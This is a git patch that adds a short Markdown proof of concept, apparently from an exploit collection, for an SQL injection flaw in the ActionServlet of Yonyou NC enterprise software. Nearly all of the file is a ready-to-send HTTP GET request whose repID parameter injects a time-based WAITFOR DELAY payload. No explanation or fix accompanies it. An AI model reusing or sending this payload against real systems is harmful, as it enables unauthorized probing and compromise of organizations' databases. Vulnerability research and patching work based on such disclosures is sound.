From 4e0dfc3d5cd6e85ca8d62a9a90ff1e2ca5cb9686 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 14 Apr 2024 19:16:29 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BNC-ActionServlet?= =?UTF-8?q?=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友NC-ActionServlet存在SQL注入漏洞.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 用友NC-ActionServlet存在SQL注入漏洞.md diff --git a/用友NC-ActionServlet存在SQL注入漏洞.md b/用友NC-ActionServlet存在SQL注入漏洞.md new file mode 100644 index 0000000..317d4e2 --- /dev/null +++ b/用友NC-ActionServlet存在SQL注入漏洞.md @@ -0,0 +1,13 @@ +## 用友NC-ActionServlet存在SQL注入漏洞 + + +## poc +``` +GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:5'--+&unitID=public HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +SOAPAction: http://tempuri.org/GetHomeInfo +Accept-Encoding: identity +Accept: */* +Connection: keep-alive +```